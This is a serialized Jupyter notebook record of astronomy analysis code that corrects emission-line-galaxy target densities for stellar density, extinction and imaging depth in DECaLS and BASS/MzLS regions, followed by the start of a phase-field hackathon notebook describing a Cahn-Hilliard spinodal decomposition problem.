1./(slp*stardensg[dbml]+b)\nhg1 = np.histogram(dhg[dbml],weights=1./effbm*ws,range=(-0.1,.15))\nhgn1 = np.histogram(dhg[dbml],bins=hg1[1])\nhr1 = np.histogram(dhr[rbml],bins=hg1[1])\n#DECaLS N\nslp = -0.35/4000.\nb = 1.1\nws = 1./(slp*stardensg[ddnl]+b)\n\nhg2 = np.histogram(dhg[ddnl],weights=1./effdn**2.*ws,range=(-0.1,.15))\nhgn2 = np.histogram(dhg[ddnl],bins=hg2[1])\nhr2 = np.histogram(dhr[rdnl],bins=hg2[1])\n\n#DECaLS S\nhg3 = np.histogram(dhg[ddsl],weights=1./effds**2.,range=(-0.1,.15))\nhgn3 = np.histogram(dhg[ddsl],bins=hg3[1])\nhr3 = np.histogram(dhr[rdsl],bins=hg3[1])", "_____no_output_____" ], [ "xl1 = []\nxl2 = []\nxl3 = []\nfor i in range(0,len(hg1[0])):\n xl1.append((hg1[1][i]+hg1[1][i+1])/2.)\n xl2.append((hg2[1][i]+hg2[1][i+1])/2.)\n xl3.append((hg3[1][i]+hg3[1][i+1])/2.)\nnorm1 = sum(hg1[0])/sum(hr1[0]) \nplt.errorbar(xl1,hg1[0]/hr1[0]/norm1,np.sqrt(hg1[0])/hr1[0],fmt='ko')\nplt.plot(xl1,hgn1[0]/hr1[0]/norm1,'k:')\nnorm2 = sum(hg2[0])/sum(hr2[0])\nplt.errorbar(xl2,hg2[0]/hr2[0]/norm2,np.sqrt(hg2[0])/hr2[0],fmt='rd')\nplt.plot(xl2,hgn2[0]/hr2[0]/norm2,'r:')\nnorm3 = sum(hg3[0])/sum(hr3[0])\nplt.errorbar(xl3,hg3[0]/hr3[0]/norm3,np.sqrt(hg3[0])/hr3[0],fmt='b^')\nplt.plot(xl3,hgn3[0]/hr3[0]/norm3,'b:')\nplt.ylim(.7,1.3)\nplt.xlabel('diff HI EBV')\nplt.ylabel('relative density')\nplt.legend((['bmzls','DECaLS N','DECaLS S']))\nplt.plot(xl2,np.ones(len(xl2)),'k--')\nplt.title('dashed is before MC+stellar density correction, points are after')\nplt.show()", "/usr/common/software/python/3.7-anaconda-2019.07/lib/python3.7/site-packages/ipykernel_launcher.py:12: RuntimeWarning: invalid value encountered in true_divide\n if sys.path[0] == '':\n/usr/common/software/python/3.7-anaconda-2019.07/lib/python3.7/site-packages/ipykernel_launcher.py:13: RuntimeWarning: invalid value encountered in true_divide\n del sys.path[0]\n" ], [ "plt.scatter(relg[w]['RA'],relg[w]['DEC'],c=dhr[w],s=.1,vmax=0.04,vmin=-0.04)\nplt.colorbar()\nplt.show()", "_____no_output_____" ], [ "wr = abs(dhr) > 0.02\nwg = abs(dhg) > 0.02\nprint(len(relg[wr])/len(relg))\nprint(len(felg[wg])/len(felg))", "0.08020728215856608\n0.07749707997940432\n" ], [ "#bmzls\nw1g = ~wg & dbml\nw1r = ~wr & rbml\nslp = -0.2/4000.\nb = 1.1\nws = 1./(slp*stardensg[w1g]+b)\nwsn = 1./(slp*stardensg[dbml]+b)\neffbmw = effnorthl[w1g]\nhg1 = np.histogram(felg[w1g]['EBV'],weights=1./effbmw*ws,range=(0,0.15))\nhgn1 = np.histogram(felg[dbml]['EBV'],bins=hg1[1],weights=1./effbm*wsn)\nhrn1 = np.histogram(relg[rbml]['EBV'],bins=hg1[1])\nhr1 = np.histogram(relg[w1r]['EBV'],bins=hg1[1])\n#DECaLS N\nslp = -0.35/4000.\nb = 1.1\nw1g = ~wg & ddnl\nw1r = ~wr & rdnl\nws = 1./(slp*stardensg[w1g]+b)\nwsn = 1./(slp*stardensg[ddnl]+b)\neffdnw = effsouthl[w1g]\nhg2 = np.histogram(felg[w1g]['EBV'],weights=1./effdnw**2.*ws,range=(0,0.15))\nhgn2 = np.histogram(felg[ddnl]['EBV'],bins=hg2[1],weights=1./effdn**2.*wsn)\nhrn2 = np.histogram(relg[rdnl]['EBV'],bins=hg2[1])\nhr2 = np.histogram(relg[w1r]['EBV'],bins=hg2[1])\n\n#DECaLS S\nw1g = ~wg & ddsl\nw1r = ~wr & rdsl\neffdsw = effsouthl[w1g]\nhg3 = np.histogram(felg[w1g]['EBV'],weights=1./effdsw**2.,range=(0,0.15))\nhgn3 = np.histogram(felg[ddsl]['EBV'],bins=hg3[1],weights=1./effds**2.)\nhrn3 = np.histogram(relg[rdsl]['EBV'],bins=hg3[1])\nhr3 = np.histogram(relg[w1r]['EBV'],bins=hg3[1])", "_____no_output_____" ], [ "xl1 = []\nxl2 = []\nxl3 = []\nfor i in range(0,len(hg1[0])):\n xl1.append((hg1[1][i]+hg1[1][i+1])/2.)\n xl2.append((hg2[1][i]+hg2[1][i+1])/2.)\n xl3.append((hg3[1][i]+hg3[1][i+1])/2.)\nnorm1 = sum(hg1[0])/sum(hr1[0]) \nnorm1n = sum(hgn1[0])/sum(hrn1[0]) \nplt.errorbar(xl1,hg1[0]/hr1[0]/norm1,np.sqrt(hg1[0])/hr1[0],fmt='ko')\nplt.plot(xl1,hgn1[0]/hrn1[0]/norm1n,'k:')\nnorm2 = sum(hg2[0])/sum(hr2[0])\nnorm2n = sum(hgn2[0])/sum(hrn2[0])\nplt.errorbar(xl2,hg2[0]/hr2[0]/norm2,np.sqrt(hg2[0])/hr2[0],fmt='rd')\nplt.plot(xl2,hgn2[0]/hrn2[0]/norm2n,'r:')\nnorm3 = sum(hg3[0])/sum(hr3[0])\nnorm3n = sum(hgn3[0])/sum(hrn3[0])\nplt.errorbar(xl3,hg3[0]/hr3[0]/norm3,np.sqrt(hg3[0])/hr3[0],fmt='b^')\nplt.plot(xl3,hgn3[0]/hrn3[0]/norm3n,'b:')\nplt.ylim(.7,1.3)\nplt.xlabel('E(B-V)')\nplt.ylabel('relative density')\nplt.legend((['bmzls','DECaLS N','DECaLS S']))\nplt.plot(xl2,np.ones(len(xl2)),'k--')\nplt.title(r'dashed is before masking |$\\Delta$|E(B-V)$>0.02$, points are after')\nplt.show()", "_____no_output_____" ], [ "def plotvsstar(d1,r1,reg='',fmt='ko'):\n w1 = d1 \n #w1 &= felg['MORPHTYPE'] == mp\n #w1 &= d1['EBV'] < 0.15 #mask applied to (e)BOSS\n #mr = r1['EBV'] < 0.15\n hd1 = np.histogram(stardensg[w1],range=(0,5000))\n #print(hd1)\n hr1 = np.histogram(stardensr[r1],bins=hd1[1])\n #print(hr1)\n xl = []\n for i in range(0,len(hd1[0])):\n xl.append((hd1[1][i]+hd1[1][i+1])/2.)\n plt.errorbar(xl,hd1[0]/hr1[0],np.sqrt(hd1[0])/hr1[0],fmt=fmt)\n #plt.title(str(mp)+reg)\n #plt.ylabel('relative density')\n #plt.xlabel('stellar density')\n #plt.show() ", "_____no_output_____" ], [ "morphl = np.unique(felg['MORPHTYPE'])\nprint(morphl)\n\nfor mp in morphl:\n msel = felg['MORPHTYPE'] == mp\n tsel = ddsl & msel\n tseln = ddnl & msel\n print(mp)\n print(len(felg[tsel])/len(felg[ddsl]),len(felg[tseln])/len(felg[ddnl]))\n plotvsstar(tsel,rdsl,'DECaLS South')\n plotvsstar(tseln,rdnl,'DECaLS North',fmt='rd')\n # plt.title(str(mp)+reg)\n plt.ylabel('relative density')\n plt.xlabel('stellar density')\n plt.legend(['DECaLS SGC','DECaLS NGC'])\n plt.title('selecting type '+mp)\n plt.show() ", "['COMP' 'DEV' 'EXP' 'PSF' 'REX']\nCOMP\n0.0006250175739577403 0.0002525036098296342\n(array([4296, 2823, 681, 313, 113, 91, 45, 14, 4, 0]), array([ 0., 500., 1000., 1500., 2000., 2500., 3000., 3500., 4000.,\n 4500., 5000.]))\n(array([6390625, 7861978, 2379638, 1056043, 571556, 330801, 147777,\n 44012, 9620, 476]), array([ 0., 500., 1000., 1500., 2000., 2500., 3000., 3500., 4000.,\n 4500., 5000.]))\n(array([1190, 1394, 397, 204, 184, 127, 48, 15, 0, 0]), array([ 0., 500., 1000., 1500., 2000., 2500., 3000., 3500., 4000.,\n 4500., 5000.]))\n(array([6648373, 7591555, 2130256, 1188137, 830361, 417180, 148907,\n 45106, 14234, 3329]), array([ 0., 500., 1000., 1500., 2000., 2500., 3000., 3500., 4000.,\n 4500., 5000.]))\n" ], [ "'''\nDivide DECaLS S into DES and non-DES\n'''", "_____no_output_____" ], [ "import pymangle\ndesply ='/global/cscratch1/sd/raichoor/desits/des.ply'\nmng = pymangle.mangle.Mangle(desply)", "_____no_output_____" ], [ "polyidd = mng.polyid(felg['RA'],felg['DEC'])\nisdesd = polyidd != -1", "_____no_output_____" ], [ "polyidr = mng.polyid(relg['RA'],relg['DEC'])\nisdesr = polyidr != -1", "_____no_output_____" ], [ "ddsdl = ddsl & isdesd", "_____no_output_____" ], [ "ddsndl = ddsl & ~isdesd", "_____no_output_____" ], [ "rdsdl = rdsl & isdesr\nrdsndl = rdsl & ~isdesr", "_____no_output_____" ], [ "#DECaLS SGC DES\nhg1 = np.histogram(stardensg[ddsdl],weights=1./effsouthl[ddsdl]**2.,range=(0,5000))\n#hg1 = np.histogram(stardensg[ddsdl],range=(0,5000))\nhgn1 = np.histogram(stardensg[ddsl],bins=hg3[1])\nhr1 = np.histogram(stardensr[rdsdl],bins=hg1[1])\n\n#DECaLS SGC not DES\nhg2 = np.histogram(stardensg[ddsndl],weights=1./effsouthl[ddsndl]**2.,range=(0,5000))\n#hg2 = np.histogram(stardensg[ddsndl],range=(0,5000))\nhgn2 = np.histogram(stardensg[ddsndl],bins=hg3[1])\nhr2 = np.histogram(stardensr[rdsndl],bins=hg2[1])\n\nxl1 = []\nxl2 = []\nfor i in range(0,len(hg1[0])):\n xl1.append((hg1[1][i]+hg1[1][i+1])/2.)\n xl2.append((hg2[1][i]+hg2[1][i+1])/2.)\nnorm1 = sum(hg1[0])/sum(hr1[0]) \nplt.errorbar(xl1,hg1[0]/hr1[0]/norm1,np.sqrt(hg1[0])/hr1[0],fmt='ko')\n#plt.plot(xl1,hgn1[0]/hr1[0]/norm1,'k:')\nnorm2 = sum(hg2[0])/sum(hr2[0])\nplt.errorbar(xl2,hg2[0]/hr2[0]/norm2,np.sqrt(hg2[0])/hr2[0],fmt='rd')\n#plt.plot(xl2,hgn2[0]/hr2[0]/norm2,'r:')\nplt.ylim(.7,1.3)\nplt.xlabel('Stellar Density')\nplt.ylabel('relative density')\nplt.legend((['DES','SGC, not DES']))\nplt.plot(xl2,np.ones(len(xl2)),'k--')\n#plt.title('dashed is before MC+stellar density correction, points are after')\nplt.show()", "/usr/common/software/python/3.7-anaconda-2019.07/lib/python3.7/site-packages/ipykernel_launcher.py:19: RuntimeWarning: invalid value encountered in true_divide\n" ], [ "'''\ng-band depth\n'''\n#DECaLS SGC DES\n\n\nhg1 = np.histogram(felg[ddsdl]['GALDEPTH_G']*np.exp(-3.214*felg[ddsdl]['EBV']),weights=1./effsouthl[ddsdl]**2.,range=(0,2000))\n#hg1 = np.histogram(stardensg[ddsdl],range=(0,5000))\nhgn1 = np.histogram(felg[ddsdl]['GALDEPTH_G']*np.exp(-3.214*felg[ddsdl]['EBV']),bins=hg1[1])\nhr1 = np.histogram(relg[rdsdl]['GALDEPTH_G']*np.exp(-3.214*relg[rdsdl]['EBV']),bins=hg1[1])\n\n#DECaLS SGC not DES\nhg2 = np.histogram(felg[ddsndl]['GALDEPTH_G']*np.exp(-3.214*felg[ddsndl]['EBV']),weights=1./effsouthl[ddsndl]**2.,range=(0,2000))\n#hg2 = np.histogram(stardensg[ddsndl],range=(0,5000))\nhgn2 = np.histogram(felg[ddsndl]['GALDEPTH_G']*np.exp(-3.214*felg[ddsndl]['EBV']),bins=hg2[1])\nhr2 = np.histogram(relg[rdsndl]['GALDEPTH_G']*np.exp(-3.214*relg[rdsndl]['EBV']),bins=hg2[1])\n\nxl1 = []\nxl2 = []\nfor i in range(0,len(hg1[0])):\n xl1.append((hg1[1][i]+hg1[1][i+1])/2.)\n xl2.append((hg2[1][i]+hg2[1][i+1])/2.)\nnorm1 = sum(hg1[0])/sum(hr1[0]) \nplt.errorbar(xl1,hg1[0]/hr1[0]/norm1,np.sqrt(hg1[0])/hr1[0],fmt='ko')\n#plt.plot(xl1,hgn1[0]/hr1[0]/norm1,'k:')\nnorm2 = sum(hg2[0])/sum(hr2[0])\nplt.errorbar(xl2,hg2[0]/hr2[0]/norm2,np.sqrt(hg2[0])/hr2[0],fmt='rd')\n#plt.plot(xl2,hgn2[0]/hr2[0]/norm2,'r:')\nplt.ylim(.7,1.3)\nplt.xlabel('GALDEPTH_G*MWTRANS')\nplt.ylabel('relative density')\nplt.legend((['DES','SGC, not DES']))\nplt.plot(xl2,np.ones(len(xl2)),'k--')\n#plt.title('dashed is before MC+stellar density correction, points are after')\nplt.show()", "_____no_output_____" ], [ "'''\nr-band depth\n'''\n#DECaLS SGC DES\n\n\nhg1 = np.histogram(felg[ddsdl]['GALDEPTH_R']*np.exp(-1.*R_R*felg[ddsdl]['EBV']),weights=1./effsouthl[ddsdl]**2.,range=(0,2000))\n#hg1 = np.histogram(stardensg[ddsdl],range=(0,5000))\nhgn1 = np.histogram(felg[ddsdl]['GALDEPTH_R']*np.exp(-1.*R_R*felg[ddsdl]['EBV']),bins=hg1[1])\nhr1 = np.histogram(relg[rdsdl]['GALDEPTH_R']*np.exp(-1.*R_R*relg[rdsdl]['EBV']),bins=hg1[1])\n\n#DECaLS SGC not DES\nhg2 = np.histogram(felg[ddsndl]['GALDEPTH_R']*np.exp(-1.*R_R*felg[ddsndl]['EBV']),weights=1./effsouthl[ddsndl]**2.,range=(0,2000))\n#hg2 = np.histogram(stardensg[ddsndl],range=(0,5000))\nhgn2 = np.histogram(felg[ddsndl]['GALDEPTH_R']*np.exp(-1.*R_R*felg[ddsndl]['EBV']),bins=hg2[1])\nhr2 = np.histogram(relg[rdsndl]['GALDEPTH_R']*np.exp(-1.*R_R*relg[rdsndl]['EBV']),bins=hg2[1])\n\nxl1 = []\nxl2 = []\nfor i in range(0,len(hg1[0])):\n xl1.append((hg1[1][i]+hg1[1][i+1])/2.)\n xl2.append((hg2[1][i]+hg2[1][i+1])/2.)\nnorm1 = sum(hg1[0])/sum(hr1[0]) \nplt.errorbar(xl1,hg1[0]/hr1[0]/norm1,np.sqrt(hg1[0])/hr1[0],fmt='ko')\n#plt.plot(xl1,hgn1[0]/hr1[0]/norm1,'k:')\nnorm2 = sum(hg2[0])/sum(hr2[0])\nplt.errorbar(xl2,hg2[0]/hr2[0]/norm2,np.sqrt(hg2[0])/hr2[0],fmt='rd')\n#plt.plot(xl2,hgn2[0]/hr2[0]/norm2,'r:')\nplt.ylim(.7,1.3)\nplt.xlabel('GALDEPTH_R*MWTRANS')\nplt.ylabel('relative density')\nplt.legend((['DES','SGC, not DES']))\nplt.plot(xl2,np.ones(len(xl2)),'k--')\n#plt.title('dashed is before MC+stellar density correction, points are after')\nplt.show()", "_____no_output_____" ], [ "'''\nz-band depth\n'''\n#DECaLS SGC DES\n\n\nhg1 = np.histogram(felg[ddsdl]['GALDEPTH_Z']*np.exp(-1.*R_Z*felg[ddsdl]['EBV']),weights=1./effsouthl[ddsdl]**2.,range=(0,500))\n#hg1 = np.histogram(stardensg[ddsdl],range=(0,5000))\nhgn1 = np.histogram(felg[ddsdl]['GALDEPTH_Z']*np.exp(-1.*R_Z*felg[ddsdl]['EBV']),bins=hg1[1])\nhr1 = np.histogram(relg[rdsdl]['GALDEPTH_Z']*np.exp(-1.*R_Z*relg[rdsdl]['EBV']),bins=hg1[1])\n\n#DECaLS SGC not DES\nhg2 = np.histogram(felg[ddsndl]['GALDEPTH_Z']*np.exp(-1.*R_Z*felg[ddsndl]['EBV']),weights=1./effsouthl[ddsndl]**2.,range=(0,500))\n#hg2 = np.histogram(stardensg[ddsndl],range=(0,5000))\nhgn2 = np.histogram(felg[ddsndl]['GALDEPTH_Z']*np.exp(-1.*R_Z*felg[ddsndl]['EBV']),bins=hg2[1])\nhr2 = np.histogram(relg[rdsndl]['GALDEPTH_Z']*np.exp(-1.*R_Z*relg[rdsndl]['EBV']),bins=hg2[1])\n\nxl1 = []\nxl2 = []\nfor i in range(0,len(hg1[0])):\n xl1.append((hg1[1][i]+hg1[1][i+1])/2.)\n xl2.append((hg2[1][i]+hg2[1][i+1])/2.)\nnorm1 = sum(hg1[0])/sum(hr1[0]) \nplt.errorbar(xl1,hg1[0]/hr1[0]/norm1,np.sqrt(hg1[0])/hr1[0],fmt='ko')\n#plt.plot(xl1,hgn1[0]/hr1[0]/norm1,'k:')\nnorm2 = sum(hg2[0])/sum(hr2[0])\nplt.errorbar(xl2,hg2[0]/hr2[0]/norm2,np.sqrt(hg2[0])/hr2[0],fmt='rd')\n#plt.plot(xl2,hgn2[0]/hr2[0]/norm2,'r:')\nplt.ylim(.7,1.3)\nplt.xlabel('GALDEPTH_Z*MWTRANS')\nplt.ylabel('relative density')\nplt.legend((['DES','SGC, not DES']))\nplt.plot(xl2,np.ones(len(xl2)),'k--')\n#plt.title('dashed is before MC+stellar density correction, points are after')\nplt.show()", "/usr/common/software/python/3.7-anaconda-2019.07/lib/python3.7/site-packages/ipykernel_launcher.py:24: RuntimeWarning: invalid value encountered in true_divide\n/usr/common/software/python/3.7-anaconda-2019.07/lib/python3.7/site-packages/ipykernel_launcher.py:27: RuntimeWarning: invalid value encountered in true_divide\n" ], [ "'''\nAbove results didn't quite work at low depth; checking what happens when snr requirements are ignored in the MC\nResults are gone, but they basically show that removing the snr requirements makes things worse\n'''\ngrids = np.loadtxt(os.getenv('SCRATCH')+'/ELGeffnosnrgridsouth.dat').transpose()\n#grids[3] = grids[3]\ngridn = np.loadtxt(os.getenv('SCRATCH')+'/ELGeffnosnrgridnorth.dat').transpose()\neffsouthlno = interpeff(gsig,rsig,zsig,south=True)\neffnorthlno = interpeff(gsig,rsig,zsig,south=False)", "_____no_output_____" ], [ "effbmno = effnorthlno[dbml]\nprint(np.mean(effbmno))\neffbmno = effbmno/np.mean(effbmno)\nplt.hist(effbmno,bins=100)\nplt.show()", "_____no_output_____" ], [ "effdnno = effsouthlno[ddnl]\nprint(np.mean(effdnno))\neffdnno = effdnno/np.mean(effdnno)\nplt.hist(effdnno,bins=100)\nplt.show()\n#plt.scatter(felg[dbml]['RA'],felg[dbml]['DEC'],c=effbm)\n#plt.colorbar()\n#plt.show()\neffdsno = effsouthlno[ddsl]\nprint(np.mean(effdsno))\neffdsno = effdsno/np.mean(effdsno)\nplt.hist(effdsno,bins=100)\nplt.show()\n", "_____no_output_____" ], [ "#bmzls\nslp = -0.2/4000.\nb = 1.1\nws = 1./(slp*stardensg[dbml]+b)\nhg1 = np.histogram(felg[dbml]['GALDEPTH_Z']*np.exp(-1.*R_Z*felg[dbml]['EBV']),weights=1./effbmno*ws,range=(0,200))\nhgn1 = np.histogram(felg[dbml]['GALDEPTH_Z']*np.exp(-1.*R_Z*felg[dbml]['EBV']),bins=hg1[1])\nhr1 = np.histogram(relg[rbml]['GALDEPTH_Z']*np.exp(-1.*R_Z*relg[rbml]['EBV']),bins=hg1[1])", "_____no_output_____" ], [ "#DECaLS N\nslp = -0.35/4000.\nb = 1.1\nws = 1./(slp*stardensg[ddnl]+b)\n\nhg2 = np.histogram(felg[ddnl]['GALDEPTH_Z']*np.exp(-1.*R_Z*felg[ddnl]['EBV']),weights=1./effdnno**2.*ws,range=(0,200))\nhgn2 = np.histogram(felg[ddnl]['GALDEPTH_Z']*np.exp(-1.*R_Z*felg[ddnl]['EBV']),bins=hg2[1])\nhr2 = np.histogram(relg[rdnl]['GALDEPTH_Z']*np.exp(-1.*R_Z*relg[rdnl]['EBV']),bins=hg2[1])", "_____no_output_____" ], [ "#DECaLS S\nhg3 = np.histogram(felg[ddsl]['GALDEPTH_Z']*np.exp(-1.*R_R*felg[ddsl]['EBV']),weights=1./effdsno**2.,range=(0,200))\nhgn3 = np.histogram(felg[ddsl]['GALDEPTH_Z']*np.exp(-1.*R_R*felg[ddsl]['EBV']),bins=hg3[1])\nhr3 = np.histogram(relg[rdsl]['GALDEPTH_Z']*np.exp(-1.*R_R*relg[rdsl]['EBV']),bins=hg3[1])", "_____no_output_____" ], [ "xl1 = []\nxl2 = []\nxl3 = []\nfor i in range(0,len(hg1[0])):\n xl1.append((hg1[1][i]+hg1[1][i+1])/2.)\n xl2.append((hg2[1][i]+hg2[1][i+1])/2.)\n xl3.append((hg3[1][i]+hg3[1][i+1])/2.)\nnorm1 = sum(hg1[0])/sum(hr1[0]) \nplt.errorbar(xl1,hg1[0]/hr1[0]/norm1,np.sqrt(hg1[0])/hr1[0],fmt='ko')\nplt.plot(xl1,hgn1[0]/hr1[0]/norm1,'k:')\nnorm2 = sum(hg2[0])/sum(hr2[0])\nplt.errorbar(xl2,hg2[0]/hr2[0]/norm2,np.sqrt(hg2[0])/hr2[0],fmt='rd')\nplt.plot(xl2,hgn2[0]/hr2[0]/norm2,'r:')\nnorm3 = sum(hg3[0])/sum(hr3[0])\nplt.errorbar(xl3,hg3[0]/hr3[0]/norm3,np.sqrt(hg3[0])/hr3[0],fmt='b^')\nplt.plot(xl3,hgn3[0]/hr3[0]/norm1,'b:')\nplt.ylim(.7,1.3)\nplt.xlabel('GALDEPTH_Z*MWTRANS')\nplt.ylabel('relative density')\nplt.legend((['bmzls','DECaLS N','DECaLS S']))\nplt.plot(xl2,np.ones(len(xl2)),'k--')\nplt.show()", "_____no_output_____" ], [ "#bmzls\nslp = -0.2/4000.\nb = 1.1\nws = 1./(slp*stardensg[dbml]+b)\nhg1 = np.histogram(felg[dbml]['GALDEPTH_G']*np.exp(-3.214*felg[dbml]['EBV']),weights=1./effbmno*ws,range=(0,2000))\nhr1 = np.histogram(relg[rbml]['GALDEPTH_G']*np.exp(-3.214*relg[rbml]['EBV']),bins=hg1[1])\n#no correction\nhgn1 = np.histogram(felg[dbml]['GALDEPTH_G']*np.exp(-3.214*felg[dbml]['EBV']),bins=hg1[1])\nhrn1 = np.histogram(relg[rbml]['GALDEPTH_G']*np.exp(-3.214*relg[rbml]['EBV']),bins=hg1[1])", "_____no_output_____" ], [ "#DECaLS N\nslp = -0.35/4000.\nb = 1.1\nws = 1./(slp*stardensg[ddnl]+b)\nhg2 = np.histogram(felg[ddnl]['GALDEPTH_G']*np.exp(-3.214*felg[ddnl]['EBV']),weights=1./effdnno**2.*ws,range=(0,3000))\nhr2 = np.histogram(relg[rdnl]['GALDEPTH_G']*np.exp(-3.214*relg[rdnl]['EBV']),bins=hg2[1])\n\nhgn2 = np.histogram(felg[ddnl]['GALDEPTH_G']*np.exp(-3.214*felg[ddnl]['EBV']),bins=hg2[1])\nhrn2 = np.histogram(relg[rdnl]['GALDEPTH_G']*np.exp(-3.214*relg[rdnl]['EBV']),bins=hg2[1])", "_____no_output_____" ], [ "#DECaLS S\n#no strong relation with stellar density\nhg3 = np.histogram(felg[ddsl]['GALDEPTH_G']*np.exp(-3.214*felg[ddsl]['EBV']),weights=1./effdsno**2.,range=(0,2000))\nhr3 = np.histogram(relg[rdsl]['GALDEPTH_G']*np.exp(-3.214*relg[rdsl]['EBV']),bins=hg3[1])\n\nhgn3 = np.histogram(felg[ddsl]['GALDEPTH_G']*np.exp(-3.214*felg[ddsl]['EBV']),bins=hg3[1])\nhrn3 = np.histogram(relg[rdsl]['GALDEPTH_G']*np.exp(-3.214*relg[rdsl]['EBV']),bins=hg3[1])", "_____no_output_____" ], [ "xl1 = []\nxl2 = []\nxl3 = []\nfor i in range(0,len(hg1[0])):\n xl1.append((hg1[1][i]+hg1[1][i+1])/2.)\n xl2.append((hg2[1][i]+hg2[1][i+1])/2.)\n xl3.append((hg3[1][i]+hg3[1][i+1])/2.)\nnorm1 = sum(hg1[0])/sum(hr1[0]) \nplt.errorbar(xl1,hg1[0]/hr1[0]/norm1,np.sqrt(hg1[0])/hr1[0],fmt='ko')\nplt.plot(xl1,hgn1[0]/hrn1[0]/norm1,'k:')\nnorm2 = sum(hg2[0])/sum(hr2[0])\nplt.errorbar(xl2,hg2[0]/hr2[0]/norm2,np.sqrt(hg2[0])/hr2[0],fmt='rd')\nplt.plot(xl2,hgn2[0]/hrn2[0]/norm2,'r:')\nnorm3 = sum(hg3[0])/sum(hr3[0])\nplt.errorbar(xl3,hg3[0]/hr3[0]/norm3,np.sqrt(hg3[0])/hr3[0],fmt='b^')\nplt.plot(xl3,hgn3[0]/hrn3[0]/norm1,'b:')\nplt.ylim(.7,1.3)\nplt.xlabel('GALDEPTH_G*MWTRANS')\nplt.ylabel('relative density')\nplt.legend((['bmzls','DECaLS N','DECaLS S']))\nplt.plot(xl2,np.ones(len(xl2)),'k--')\nplt.show()", "_____no_output_____" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ] ]
cb1c08ac68f7b33737dd42eb6053c2daf8c12af3
35,514
ipynb
Jupyter Notebook
hackathon1/problems.ipynb
dschwen/chimad-phase-field
a7248ee5af896719d8b604faaa2781bdbd8cbe64
[ "MIT" ]
null
null
null
hackathon1/problems.ipynb
dschwen/chimad-phase-field
a7248ee5af896719d8b604faaa2781bdbd8cbe64
[ "MIT" ]
null
null
null
hackathon1/problems.ipynb
dschwen/chimad-phase-field
a7248ee5af896719d8b604faaa2781bdbd8cbe64
[ "MIT" ]
null
null
null
51.025862
5,186
0.567945
[ [ [ "from IPython.display import HTML\n\nHTML('''<script>\ncode_show=true; \nfunction code_toggle() {\n if (code_show){\n $('div.input').hide();\n $('div.prompt').hide();\n } else {\n $('div.input').show();\n$('div.prompt').show();\n }\n code_show = !code_show\n} \n$( document ).ready(code_toggle);\n</script>\n<form action=\"javascript:code_toggle()\"><input type=\"submit\" value=\"Code Toggle\"></form>''')", "_____no_output_____" ] ], [ [ "# Table of Contents\n* [Challenge Problems](#Challenge-Problems)\n\t* [1. Spinodal Decomposition - Cahn-Hilliard](#1.-Spinodal-Decomposition---Cahn-Hilliard)\n\t\t* [Parameter Values](#Parameter-Values)\n\t\t* [Initial Conditions](#Initial-Conditions)\n\t\t* [Domains](#Domains)\n\t\t\t* [a. Square Periodic](#a.-Square-Periodic)\n\t\t\t* [b. No Flux](#b.-No-Flux)\n\t\t\t* [c. T-Shape No Flux](#c.-T-Shape-No-Flux)\n\t\t\t* [d. Sphere](#d.-Sphere)\n\t\t* [Tasks](#Tasks)\n\t* [2. Ostwald Ripening -- coupled Cahn-Hilliard and Allen-Cahn equations](#2.-Ostwald-Ripening----coupled-Cahn-Hilliard-and-Allen-Cahn-equations)\n\t\t* [Parameter Values](#Parameter-Values)\n\t\t* [Initial Conditions](#Initial-Conditions)\n\t\t* [Domains](#Domains)\n\t\t\t* [a. Square Periodic](#a.-Square-Periodic)\n\t\t\t* [b. No Flux](#b.-No-Flux)\n\t\t\t* [c. T-Shape No Flux](#c.-T-Shape-No-Flux)\n\t\t\t* [d. Sphere](#d.-Sphere)\n\t\t* [Tasks](#Tasks)\n", "_____no_output_____" ], [ "# Challenge Problems", "_____no_output_____" ], [ "For the first hackathon there are two challenge problems, a spinodal decomposition problem and an Ostwald ripening problem. The only solutions included here currently are with FiPy.", "_____no_output_____" ], [ "## 1. Spinodal Decomposition - Cahn-Hilliard", "_____no_output_____" ], [ "The free energy density is given by,\n\n$$ f = f_0 \\left[ c \\left( \\vec{r} \\right) \\right] + \\frac{\\kappa}{2} \\left| \\nabla c \\left( \\vec{r} \\right) \\right|^2 $$\n\nwhere $f_0$ is the bulk free energy density given by,\n\n$$ f_0\\left[ c \\left( \\vec{r} \\right) \\right] =\n - \\frac{A}{2} \\left(c - c_m\\right)^2\n + \\frac{B}{4} \\left(c - c_m\\right)^4\n + \\frac{c_{\\alpha}}{4} \\left(c - c_{\\alpha} \\right)^4\n + \\frac{c_{\\beta}}{4} \\left(c - c_{\\beta} \\right)^4 $$\n\nwhere $c_m = \\frac{1}{2} \\left( c_{\\alpha} + c_{\\beta} \\right)$ and $c_{\\alpha}$ and $c_{\\beta}$ are the concentrations at which the bulk free energy density has minima (corresponding to the solubilities in the matrix phase and the second phase, respectively).\n\nThe time evolution of the concentration field, $c$, is given by the Cahn-Hilliard equation:\n\n$$ \\frac{\\partial c}{\\partial t} = \\nabla \\cdot \\left[\n D \\left( c \\right) \\nabla \\left( \\frac{ \\partial f_0 }{ \\partial c} - \\kappa \\nabla^2 c \\right)\n \\right] $$\n\nwhere $D$ is the diffusivity.", "_____no_output_____" ], [ "### Parameter Values", "_____no_output_____" ], [ "Use the following parameter values.\n\n<table width=\"200\">\n<tr>\n<td> $c_{\\alpha}$ </td>\n<td> 0.05 </td>\n</tr>\n<tr>\n<td> $c_{\\beta}$ </td>\n<td> 0.95 </td>\n</tr>\n<tr>\n<td> A </td>\n<td> 2.0 </td>\n</tr>\n<tr>\n<td> $\\kappa$ </td>\n<td> 2.0 </td>\n</tr>\n</table>\n\nwith\n\n$$ B = \\frac{A}{\\left( c_{\\alpha} - c_m \\right)^2} $$\n\n$$ D = D_{\\alpha} = D_{\\beta} = \\frac{2}{c_{\\beta} - c_{\\alpha}} $$", "_____no_output_____" ], [ "### Initial Conditions", "_____no_output_____" ], [ "Set $c\\left(\\vec{r}, t\\right)$ such that\n\n$$ c\\left(\\vec{r}, 0\\right) = \\bar{c}_0 + \\epsilon \\cos \\left( \\vec{q} \\cdot \\vec{r} \\right) 